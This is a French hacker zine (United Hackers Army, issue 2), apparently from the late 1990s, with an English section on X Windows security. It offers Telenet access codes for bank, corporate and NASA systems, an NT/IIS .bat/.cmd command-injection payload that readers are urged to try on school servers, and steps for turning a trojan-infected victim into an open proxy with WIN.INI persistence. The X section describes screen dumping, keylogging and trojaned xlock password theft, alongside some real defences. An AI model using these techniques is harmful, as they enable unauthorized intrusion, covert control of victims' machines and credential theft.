                                                                            
                                                                            
#############################################################################
#                           United Hackers Army                             #
#                                                                           #
#                                   Zine                                    # 
#                                                                           #
#              Bienvenu dans le zine du United Hackers Army                 #
#         Pour mieux profiter de ce zine downloader notre police a :        #
#              http://members.xoom.com/UHA_Daemon/UHAfont.zip               #
#                      Lisez le avec Office ou Word                         #
#                       Commentaire ou suggestions :                        #
#                         Assassin_89@hotmail.com                           #
#                              UIN : 6795799                                #
#############################################################################


Ce Zine est publier par : [DaeMoN] en collaboration avec le UHA et tout les 
autres qui y participe

_____________________________________________________________________________
_____________________________________________________________________________



                              ##############
                              #Introduction#
                              ##############


OK j'ai eu des trs commentaire pour le zine prcdent alors je vais essayer 
de faire mieux dans celui ci sinon je vais encore me faire cogner sur les 
doigts  Avant de commencer j'aimerais avouer que j'ai vraiment pas t 
correcte avec le crew IGA , alors je tien a m'excuser formellement a tout 
les membres de ce clan Pas a cause que j'ai peur de eux non mais plutt pcq 
j'ai des commentaire ngatif a cause de ca alors a tout les membres du IGA 
Le UHA et moi mme s'excuse
Bon c fais   alors on peu commencer , et j'espre que mes lecteurs vont 
tre + satisfais de celui ci ! ! !

Je me suis aussi fais dire que j'avais pas donner de cause a ce zine  
hehe a bien y penser c vrai j'y avais vraiment pas penser mais bon ce 
zine je le fais pcq je veux tendre ma connaissance et que je n'aime pas 
que les newbies vienne me demander comment on hack alors dans ce cas la 
je leur donnais des zine mais la je leur donne le mien ! !
 

Alors je vais faire une petite liste de ce que je vais parler dans le #2

1. Telnet (longtemps j'ai plein de truc a dire)
2. Windows NT
3. Encore des gate (mais cette fois je vous explique comment rendre un mec 
   gate avec le sockets de Troie et 2 autre fichier que j'ai cr.)
4. Et on verra pour la suite je c pas encore dsoler.

_____________________________________________________________________________
_____________________________________________________________________________



                               #############
                               #1er article#
                               #############


Alors Telnet quel belle outil aussi trs efficace ce texte est pour ceux 
qui aurais des petites envie suicidaire pcq je connais pas vraiment de 
moyen de ce spoofer en Telnet si ce n'est que de prendre des account 
hacker

Bon par o commencer Je c pas vraiment mais on commencer a quelque 
part ! !hehe

Hehe on va commencer ca puissant je vais vous donner les Access Code pour 
pas mal de place de Data Base des US.

JE NE SUIS PAS RESPONSABLE DES ERREURES COMMIT PAR VOUS ! !
CECI EST A BUT EDUCATIF SEULEMENT ! ! !

OK la 1er chose a faire c de trouver le # de tel de votre terminal Telnet 
local Un bon moyen c d'appeler a votre fournisseur de CPU et de dire que 
vous avez perdu le papier sur lequel il tait marqu il vont vous le donn 
90% du temps

Ensuite on ce plug au Telnet local (avec Telnet) quand vous tes connecter 
  faire <Enter>
Ensuite vous allez voir apparatre "TERMINAL=" taper encore <Enter>
Alors c la que ca commence tout dpendant de votre Terminal vous allez 
  voir apparatre un mots suivit de : 
C la que vous entrer l'Access code Je vous en donne assez pour que vous 
vous amusiez pendant heeeeeee jusqu' ce que vous vous faites pogner
hehehehe

Access Code

C 20120 - VM 370 ONLINE
C 20124N- NEW YORK TIME INFORMATION SERVICE
C 20125 - NJIT ELECTRONIC INFORMATION
C 20130
C 20133
C 20138
C 20148
C 20154
C 20165
C 20166
C 20167 - WARNER COMPUTER SYSTEMS
C 20168 - WARNER COMPUTER SYSTEMS
C 20171
C 20182 - BANKERS TRUST CUSTOMER SERVICE
C 20184
C 20222
C 20225 - COMSHARE "COMMANDER II"
C 20246
C 20247 - GSD TIMESHARING
C 20270 - GSD TIMESHARING
C 202124- GENERAL MOTORS WARREN
C 202133
C 202138- (TYPE .HELP *)
C 202139- (TYPE .HELP *)
C 202140- (TYPE .HELP *)
C 202143
C 202144- (TYPE .HELP *)
C 202148
C 202149
C 202175 - HONEYWELL
C 202222 - GM PARTS
C 202229 - PRIMENET
C 20321  - WYLBUR
C 21221  - PRIMENET
C 21224  - PRIMENET
C 21225  - INTERACTIVE MARKET SYSTEMS
C 21226  - INTERACTIVE MARKET SYSTEMS
C 21228  - BURROUGHS NYC DATA CENTER
C 21229  - LANDART SYSTEMS
C 21231  - E.F.HUTTON
C 21233  - UNIVAC 1100
C 21247
C 21248
C 21252
C 21253  - VM/370 ONLINE
C 21256  - CITIBANK CASH MANAGER
C 21264  - CITICASH MANAGER INTERNATIONAL
C 21265  - CITICASH MANAGER INTERNATIONAL
C 21269
C 21281  - BANKERS TRUST CUSTOMER SERVICE
C 21284  - DATAMOR TIME SHARING
C 21288  - S-K WDC SYSTEM 1/ONLINE
C 212136 - (TYPE NEW/TSC)
C 212141
C 212142
C 212151 - CITICASH MANAGER INTERNATIONAL
C 212152
C 21255  - PRIMENET
C 21256  - PRIMENET
C 212160 - TELSTAT SIGMA 6
C 212167 - RSTS V.7.0-07
C 212168 - RSTS V.7.0-07
C 212171
C 212172
C 21284  - DATAMOR TIME SHARING
C 21325  - PRIMENET
C 21335  - MARKETRON RESEARCH AND SALES
C 21336  - MARKETRON RESEARCH AND SALES
C 21341
C 21360
C 21365
C 21366
C 213170 - DIALOG
C 21370  - XCC-WEST SYSTEM X2
C 21371  - XCC-WEST SYSTEM X3
C 21372  - XCC-WEST SYSTEM X3
C 21373  - XCC-WEST SYSTEM X1
C 21375  - XCC-WEST SYSTEM X2
C 21379  - INTERACTIVE SYSTEM/ONE
C 21384
C 21385
C 21386  - IAS PROGRAM DEVELOPMENT SYSTEM
C 21388
C 213105
C 21520  - TPF&C ONLINE
C 21534  - PRIMENET
C 21538
C 21722
C 21725
C 21726  - U OF I COMPUTING SERVICES
C 30121  - NASA RECON
C 30124  - SOURCE SYSTEM 10
C 30126  - DISTRIBUTIVE NETWORK
C 30128  - SOURCE SYSTEM 13
C 30134  - INTERACTIVE(GAITHERSBURG)
C 30135
C 30136
C 30138  - SOURCE SYSTEM 11
C 30147  - SOURCE SYSTEM 12
C 30148  - SOURCE SYSTEM 15
C 30149  - SOURCE SYSTEM 14
C 30320  - COMPUTER SHARING SERVICES
C 30330  - COMPUTER SHARING SERVICES
C 30335
C 30337  - PRIMENET
C 30339  - PRIMENET
C 30340  - PRIMENET
C 303125
C 30520
C 30522
C 30531
C 30532  - C.S.I. TIMESHARING SERVICE
C 30523  - C.S.I. TIMESHARING SERVICE
C 31231  - C.I.C. TIMESHARING
C 31232
C 31235
C 31236
C 31240
C 31247
C 31248
C 31249
C 31250
C 31254
C 31279
C 31289
C 312124
C 312127
C 31325
C 31327
C 31340  - ADP NETWORK
C 31341  - ADP NETWORK
C 31345  - PRIMENET
C 31359  - GENERAL MOTORS WARREN
C 31360  - GENERAL MOTORS WARREN
C 31361  - GM PARTS
C 31363  - VM/370 ONLINE
C 31370  - GM DECSYSTEM-20 TIMESHARING
C 31422
C 31423
C 31424  - MCAUTO VM/370 ONLINE
C 31425  - MCAUTO VM/370 ONLINE
C 31426
C 31432
C 31435  - PRIMENET
C 31444
C 31726  - RSTS V06C-04
C 40420
C 40434
C 40822
C 41520 - DIALOG
C 41527 - STANFORD IBM-3033A
C 41548 - DIALOG
C 41556
C 41560
C 41561
C 41562
C 41567
C 41580  - HARPER GROUP INFORMATION NETWORK
C 41587  - BUSSIPLEXER
C 51632
C 51633
C 51634
C 51638
C 51646
C 51647  - VM/370 ONLINE
C 51729
C 60320  - DARTMOUTH COLLEGE COMPUTING
C 60322
C 60324
C 60328
C 60331
C 60720
C 60942
C 60945
C 61114
C 61115
C 61118
C 61120
C 61221
C 61724
C 61735  - (TYPE D FOR SYSTEM) APPLIED LOGIC NETWORK CONTROL
C 61748  - PRIMENET
C 61750  - PRIMENET
C 61760  - (TYPE D FOR SYSTEM) APPLIED LOGIC NETWORK CONTROL
C 61766  - PRIMENET
C 61767  - PRIMENET
C 61770  - NDC-SYSTEM#
C 61774
C 61776  - NDC-SYSTEM#
C 61777  - NDC-SYSTEM#
C 61778  - PRIMENET
C 617120
C 617121
C 617124
C 617125
C 617127
C 617133
C 617135 - VM/370 ONLINE
C 61737  - VM/370 ONLINE
C 617138 - MASSACHUSETTS INSTITUE OF
C 617139 - MASSACHUSETTS INSTITUE OF
C 617140 - VM/370 ONLINE
C 617151
C 617152
C 617159
C 61763
C 61769  - (TYPE D FOR SYSTEM) APPLIED LOGIC NETWORK
C 61770  - BPL-INFORONICS
C 617171 - INTERACT LINE
C 617177 - ERT ENVIRONET
C 617178
C 617179 - ERT ENVIRONET
C 61780  - (TYPE HELP)
C 71424  - GLOBAL DATA TIMESHARING
C 71431  - (TYPE HELP)
C 71620  - UNION CARBIDE
C 80331
C 80423  - CONTROL DATA INTERCOM
C 80424  - CONTROL DATA INTERCOM
C 80426  - BABCOCK AND WILCOX
C 81623
C 81625  - UNINET
C 81626  - UNINET
C 90995D - TELENET NEWS SERVICE
C 91930
C 91931
C 91933
C 91934

Amuser vous avec Telemail trs plaisant  souvent le User ID est les 
initial des personnes 
Hehe maintenant c a vous de corriger/additionner les ou des dfauts hehe 
Bon c OK pour ca ! ! !
Dans le fond J'ai pas le got d'en parler + longtemps J'ai plein d'autre 
chose a dire sur Telnet mais bon peut tre + tard dans le zine

_____________________________________________________________________________
_____________________________________________________________________________



                               ##############
                               #2iem Article#
                               ##############


Bon Les NT quel merde mais que voulez vous Billes Gate est venu sur la 
terre pour mettre de la merde sur le marcher et rcolter de l'argent EN 
PLUS ! ! !hehe non mais faux avouer que il fais du bl en criss avec c 
truc de Windows 95 et NT en plus de tout les autre truc faites pas 
Microsuck  Bon OK il fais beaucoup d'argent mais ya beaucoup de bug dans 
ses soft ! !
Alors dans cette article on va voir un peu les bug que l'ont peut exploiter 
avec les NT

 Ici je vous fais la prsentation du 1 bug de NT seulement mais il y en a 
des millier je vais vous faire part de 1 bug par zine alors si votre cole 
utilise des 1 NT vous aller bien vous amuser !

Les bug .bat et .cmd son quand mme assez reconnue avec Netscape(preuve 
que Gate est incomptent)   

Si le serveur NT est installer par dfaut 
1. Le CGI rpertoire est /scripts
2. Il n'y a pas de fichier exemple.bat ou exemple.cmd dans le rpertoire 
   par contre
3. Les extensions .bat et .cmd son appliquer dans cmd.exe avec la base de 
   registre 
HK_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\ScriptMap
    Avec la commande suivante 
    .bat or .cmd =C:\WINNT35\System32\cmd.exe /c %s %s

Passons a l'attaque
Dans ce cas si vous en t'en que malicieuse personne vous allez entrer une 
des 2 commande suivante 
                 a) /scripts/exemple.bat/ ?&dir+c:\+ ?&time
                 b) /scripts/exemple.cmd/ ?&dir+c:\+ ?&time
1. Aller au rpertoire aux quel vous voulez le fichier et entrer ce type 
   de commande
2. Faite <Enter> comme pour aller au document !
3. Clicker le bouton cancel sinon l'opration ne va pas ce terminer a cause 
   du " time "
4. C fais en + ya rien qui est loguer dans le NT gnial non ? Maintenant 
   vous pouvez excuter n'importe quel commande dans le NT en .bat et .cmd 
   efficace et facile 

En rsumer 
1. Le NT permet a vous de excuter un batch avec la commande 
   /scripts/exemple.bat ?&command1 +?&command2+ ?&+ ?&commandn
2. Il n'y a pas de fichier exemple.bat mais la commande est excuter avec 
   C:\WINNT35\System32\CMD.EXE
3. Dans ce cas vous pouvez utiliser la commandn " date " et " time " et 
   vous ne serai jamais loguer su systme puisque c'est commande son infini.

Bon je crois que c assez essayer d'exploiter ce bug sur les NT de votre 
cole (pour ceux donc ca les concerne) moi je l'ai tester sur le NT de mon 
cole et il a marcher mme trs bien allez je vous en dit pas +


_____________________________________________________________________________
_____________________________________________________________________________



                                ##############
                                #3iem Article#
                                ##############



Hehe c ici que j'avais hte d'tre arriver car ca j'ai monter ce coup du 
dbut a la fin avec wingate et j'en suis plutt fier pcq c trs efficace 
et ca marche a chaque coup je vais vous expliquer avec 2 petit fichier trs 
sympa comment transformer une simple personne infecter par le sockets de 
Troie en gate complte et utilisable a 100% j'ai bien hte que vous 
lisiez ca Alors on y va a fond la caisse.

Le matriel :
1. Une personne infecter par le Sockets de Troie
2. Ce fichier reg.reg http://members.xoom.com/UHA_Daemon/reg.zip
3. Cette autre fichier http://members.xoom.com/UHA_Daemon/DaeMoNgate.zip
4. Et lire le reste du texte

Bon pas vraiment compliquer comme tactique On se connecte au client 
(comme a tout les fois que l'on utilise sockets) avec le port OK
Ensuite on va dans Disque Dure et on entre dans c:\windows
On fais un envoie de fichier et on envoie les deux fichiers que vous avez 
downloader 
Quand les 2 fichier son fini d'envoyer on fais actualiser et on excute reg.reg
Aprs on excute DaeMoNgate.exe on attend 2 a 3 seconde et on s'assure 
que la personne est maintenant bien une gate en faisant un scan port
Si les port

21
23
31
80
808
1080
1090
1156
8010

sont ouvert et + encore et bien votre personne est gate au complet sans 
aucun passwd mais pas a tout jamais vous avez a l'excuter a chaque fois 
que la personne reboot mais j'ai quelque solution a ce problme
1. Vous envoyer un .ink (raccourcie) dans son fichier dmarrage de Windows 
   si vous cr un .ink n'importe ou au dbut de l'excution de Windows il 
   va rechercher le fichier pendant une ou deux seconde mais si vous avez 
   pris un poisson comme c souvent le cas il ne se rendra compte de rien du 
   tout
2. Il y a une deuxime mthode un peu plus longue mais tout aussi efficace 
   sinon + car le mec ni voit que du feux Vous allez dans 
   c :\windows et recevez le fichier WIN.INI 
3. et vous y ajouter un path comme suit 
      [windows]
      run=c:\windows\DaeMoNgate.exe
4. Et hop si la personne ne regarde jamais au grand jamais son fichier 
    WIN.INI ben elle est                                 
      fichu gate a vie

Alors ca termine mon article sur cela j'espre que vous l'avez apprcier et 
que vous allez vous amuser avec ca en t k moi je m'amuse beaucoup En + 
je suis content d'avoir fais cette article car je viens de trouver un 
path mystre dans mon WIN.INI 

[windows]
run=c:\windows\WinHelper.exe
Huuuuummmmmmmm je me demande bien de ou ca viens j'ai jamais vu ca nulpart 
en t k surment un putain de  trojanmais je me demande bien lequel en t k 
je vous enmerde pas plus longtemps avec mes histoires On s'en va vers un 
nouvel article


_____________________________________________________________________________
_____________________________________________________________________________



                                 ##############
                                 #4iem Article#
                                 ##############



Hehe bon bon bon ! !
Haha je viens de lire le nouveau zine du IGA faux croire que le mec ca la
offusquer haha mais dans le fond La vrit choque pis je tiens a lui dire 
que il n'y a pas que moi dans le UHA sauf que ya rien qui m'empche de pas 
les nommer mais pkoi pas Je vais nommer les membre de notre fameux clan 
TELLEMENT LAME  Haha une chose de sur c que MOI je roule pas tjrs a mIRC 
a essayer de hacker un server en winblowz pour tjrs cout ca
IGA
iLLEGAL gARANTED aCCESS
" Be back to phuck you "
HUMMMMMM dans le cul ? ?non merci les mecs j'ai pas me faire mettre 
En t k j'en dit pas plus j'en rien a foutre de ce que pence c mec.
Pis Master Paradise ben...faux tres vraiment vraiment nul pour pas le 
trouver.

Les membres 

Surpeme brain

or H-Atrx 
|Ki||aX| UHA-Cha0tiC

Teachers

LOGICKhAn (UHA(t)

Students

Tr|cers(UHA(w)

Warriors

|ElNiO| (UHA(w)
GeGus(UHA(w)

Bon on passe au 4iem article on va faire un peu de scurit en Xwindows ca 
va tre le dernier article j'ai pus le got d'crire 
Alors Xwindows c le genre windows mais en *nix beaucoup + stable et plus 
puissant que winblowz par contre c encore a interface visuel et trs a 
plate aucune commande que la sourie ou presque mais bon au - c en *nix 
et c + efficace Mais un truc j'ai cris cette article en anglais il y a un 
petit bout et j'ai vraiment pas le got de le retranscrire alors vous allez 
lire en anglais je c que c plate mais bon je vais pas rcrire 5 6 page de 
texte
On commence !

Crash Course in X Windows Security

1. Motivation / introduction 
2. How open X displays are found 
3. The local-host problem 
4. Snooping techniques - dumping windows 
5. Snooping techniques - reading keyboard 
6. Xterm - secure keyboard option
7. Trojan X programs [xlock and xdm] 
8. X Security tools - xauth MIT-MAGIC-COOKIE 
9. Concluding remarks





1. Motivation / introduction

X windows pose a security risk. Through a network, anyone can connect
to an open X display, read the keyboard, dump the screen and windows
and start applications on the unprotected display. Even if this is a
known fact throughout the computer security world, few attempts on
informing the user community of the security risks involved have been
made.  This article deals with some of the aspects of X windows
security. It is in no sense a complete guide to the subject, but
rather an introduction to a not-so-known field of computer
security. Knowledge of the basics of the X windows system is
necessary, I haven't bothered including an introductory section to
explain the fundamentals. I wrote some code during the research for
this article, but none of it is included herein.  If the lingual flow
of English seem mayhap strange and erroneous from byte to byte, this
is due to the fact that I'm Scandinavian.  Bare with it. :)





2. How open X displays are found

An open X display is in formal terms an X server that has its access
control disabled. Disabling access control is normally done with the
xhost command.

$ xhost +

allows connections from any host. A single host can be allowed
connection with the command

$ xhost + ZZZ.ZZZ.ZZZ.ZZZ

where Z is the IP address or host-name. Access control can be enabled
by issuing an

$ xhost - 

command. In this case no host but the local-host can connect to the
display.  Period. It is as simple as that - if the display runs in
'xhost -' state, you are safe from programs that scans and attaches to
unprotected X displays.  You can check the access control of your
display by simply typing xhost from a shell. Sadly enough, most sites
run their X displays with access control disabled as default. They are
therefore easy prey for the various scanner programs circulating on
the net.

Anyone with a bit of knowledge about Xlib and sockets programming can
write an X scanner in a couple of hours. The task is normally
accomplished by probing the port that is reserved for X windows,
number 6000. If anything is alive at that port, the scanner calls
XOpenDisplay("IP-ADDRESS:0.0") that will return a pointer to the
display structure, if and only if the target display has its access
control disabled. If access control is enabled, XOpenDisplay returns 0
and reports that the display could not be opened.

E.g:

Xlib: connection to "display:0.0" refused by server
Xlib: Client is not authorized to connect to Server

The probing of port 6000 is necessary because of the fact that calling
XOpenDisplay() on a host that runs no X server will simply hang the
calling process. So much for unix programming conventions. :)

I wrote a program called xscan that could scan an entire subnet or
scan the entries in /etc/hosts for open X displays. My remark about
most sites running X displays with access control disabled, originates
from running xscan towards several sites on the internet.





3. The localhost problem

Running your display with access control enabled by using 'xhost -'
will guard you from XOpenDisplay attempts through port number
6000. But there is one way an eavesdropper can bypass this
protection. If he can log into your host, he can connect to the
display of the localhost. The trick is fairly simple. By issuing these
few lines, dumping the screen of the host 'target' is accomplished:

$ rlogin target
$ xwd -root -display localhost:0.0 > ~/snarfed.xwd
$ exit
$ xwud -in ~/snarfed.xwd

And voila, we have a screendump of the root window of the X server
target. 

Of course, an intruder must have an account on your system and be able
to log into the host where the specific X server runs. On sites with a
lot of X terminals, this means that no X display is safe from those
with access. If you can run a process on a host, you can connect to
(any of) its X displays.

Every Xlib routine has the Display structure as it's first
argument. By successfully opening a display, you can manipulate it
with every Xlib call available. For an intruder, the most 'important'
ways of manipulating is grabbing windows and keystrokes.






4. Snooping techniques - dumping windows

The most natural way of snarfing a window from an X server is by using
the X11R5 utility xwd or X Window System dumping utility. To get a
grip of the program, here's a small excerpt from the man page

 DESCRIPTION
      Xwd is an X Window System window dumping utility.  Xwd allows Xusers
      to store window images in a specially formatted dump file.  This file
      can then be read by various other X utilities for redisplay, printing,
      editing, formatting, archiving, image processing, etc.  The target
      window is selected by clicking the pointer in the desired window.  The
      keyboard bell is rung once at the beginning of the dump and twice when
      the dump is completed.

Shortly, xwd is a tool for dumping X windows into a format readable by
another program, xwud. To keep the trend, here's an excerpt from the
man page of xwud:


 DESCRIPTION
      Xwud is an X Window System image undumping utility.  Xwud allows X
      users to display in a window an image saved in a specially formatted
      dump file, such as produced by xwd(1).

I will not go in detail of how to use these programs, as they are both
self-explanatory and easy to use. Both the entire root window, a
specified window (by name) can be dumped, or a specified screen.  As a
'security measure' xwd will beep the terminal it is dumping from, once
when xwd is started, and once when it is finished (regardless of the
xset b off command). But with the source code available, it is a
matter of small modification to compile a version of xwd that doesn't
beep or otherwise identifies itself - on the process list e.g.  If we
wanted to dump the root window or any other window from a host, we
could simply pick a window from the process list, which often gives
away the name of the window through the -name flag.  As before
mentioned, to dump the entire screen from a host:

$ xwd -root localhost:0.0 > file

the output can be directed to a file, and read with

$ xwud -in file

or just piped straight to the xwud command.

Xterm windows are a different thing. You can not specify the name of
an xterm and then dump it. They are somehow blocked towards the
X_Getimage primitive used by xwd, so the following

$ xwd -name xterm

will result in an error. However, the entire root window (with Xterms
and all) can still be dumped and watched by xwud. Some protection.






5. Snooping techniques - reading keyboard

If you can connect to a display, you can also log and store every
keystroke that passes through the X server. A program circulating the
net, called xkey, does this trick. A kind of higher-level version of
the infamous ttysnoop.c. I wrote my own, who could read the keystrokes
of a specific window ID (not just every keystroke, as my version of
xkey).  The window ID's of a specific root-window, can be acquired
with a call to XQueryTree(), that will return the XWindowAttributes of
every window present. The window manager must be able to control every
window-ID and what keys are pressed down at what time.  By use of the
window-manager functions of Xlib, KeyPress events can be captured, and
KeySyms can be turned into characters by continuous calls to
XLookupString. 

You can even send KeySym's to a Window. An intruder may therefore not
only snoop on your activity, he can also send keyboard events to
processes, like they were typed on the keyboard.  Reading/writing
keyboard events to an xterm window opens new horizons in process
manipulation from remote. Luckily, xterm has good protection
techniques for prohibiting access to the keyboard events.





6. Xterm - Secure keyboard option

A lot of passwords is typed in an xterm window. It is therefore
crucial that the user has full control over which processes can read
and write to an xterm.  The permission for the X server to send events
to an Xterm window, is set at compile time. The default is false,
meaning that all SendEvent requests from the X server to an xterm
window is discarded. You can overwrite the compile-time setting with a
standard resource definition in the .Xdefaults file:

xterm*allowSendEvents	True

or by selecting Allow Sendevents on the Xterm Main Options
menu. (Accessed by pressing CTRL and the left mouse button But this is
_not_ recommended. Neither by me, nor the man page. ;) Read access is
a different thing. 

Xterms mechanism for hindering other X clients to read the keyboard
during entering of sensitive data, passwords etc. is by using the
XGrabKeyboard() call. Only one process can grab the keyboard at any
one time. To activate the Secure Keyboard option, choose the Main
Options menu in your Xterm window (CTRL+Left mouse button) and select
Secure Keyboard.  If the colors of your xterm window inverts, the
keyboard is now Grabbed, and no other X client can read the KeySyms.

The versions of Xterm X11R5 without patch26 also contain a rather
nasty and very well known security hole that enables any user to
become root through clever use of symbolic links to the password
file. The Xterm process need to be setuid for this hole to be
exploitable.  Refer to the Cert Advisory:
CA-93:17.xterm.logging.vulnerability.

7. Trojan X clients - xlock and X based logins

Can you think of a more suitable program for installing a
password-grabbing trojan horse than xlock? I myself cannot. With a few
lines added to the getPassword routine in xlock.c, the password of
every user using the trojan version of xlock can be stashed away in a
file for later use by an intruder. The changes are so minimal, only a
couple of bytes will tell the real version from the trojan version.

If a user has a writable homedir and a ./ in her PATH environment
variable, she is vulnerable to this kind of attack. Getting the
password is achieved by placing a trojan version of Xlock in the users
homedir and waiting for an invocation.  The functionality of the
original Xlock is contained in the trojan version.  The trojan version
can even tidy up and destroy itself after one succesfull attempt, and
the user will not know that his password has been captured.

Xlock, like every password-prompting program, should be regarded with
suspicion if it shows up in places it should not be, like in your own
homedir.

Spoofed X based logins however are a bit more tricky for the intruder
to accomplish.  He must simulate the login screen of the login program
ran by XDM. The only way to ensure that you get the proper XDM login
program (if you want to be really paranoid) is to restart the
X-terminal, whatever key combination that will be for the terminal in
question.


8. X Security tools - xauth MIT-MAGIC-COOKIE 

To avoid unathorized connections to your X display, the command xauth
for encrypted X connections is widely used. When you login, xdm
creates a file .Xauthority in your homedir. This file is binary, and
readable only through the xauth command. If you issue the command

$ xauth list

you will get an output of:

your.display.ip:0  MIT-MAGIC-COOKIE-1  73773549724b76682f726d42544a684a

  display name     authorization type               key

The .Xauthority file sometimes contains information from older
sessions, but this is not important, as a new key is created at every
login session. To access a display with xauth active - you must have
the current access key.

If you want to open your display for connections from a particular
user, you must inform him of your key.
He must then issue the command 

$ xauth add your.display.ip:0  MIT-MAGIC-COOKIE-1 73773549724b7668etc.

Now, only that user (including yourself) can connect to your display.
Xauthority is simple and powerful, and eliminates many of the security
problems with X.

_____________________________________________________________________________
_____________________________________________________________________________



                                ############
                                #Conclusion#
                                ############


Bon c dj la fin du 2iem article mais je vais revenir en force avec un 
3iem ne vous en faite pas c officiel , alors regarder ca de temps en temps 
sur www.mtlhackers.com il va y tre si vous avez des commentaire ne vous 
gner pas crivez moi a assassin_89@hotmail.com
Ou contacter moi pas ICQ UIN : 6795799
Pis je dit a tout les mecs qui roule en windows " Ben trouver partition 
magique faite vous une autre partition pis installer un *nix " SVP hehe 
alors c la fin.
HAAAAA c vrai la passe pour les Wwwboard c pas dans cette article encore 
dsoler

#############################################################################
#                                                                           #
#                       Editer par : [DaeMoN]=UHA=                          #
#                    mailto : assassin_89@hotmail.com                       #
#                             UIN : 6795799                                 #
#         HTTP : http://members.xoom.com/UHA_Daemon (construction ultime)   #
#                      2 : http://atrax.home.ml.org                         #
#                                                                           #
#############################################################################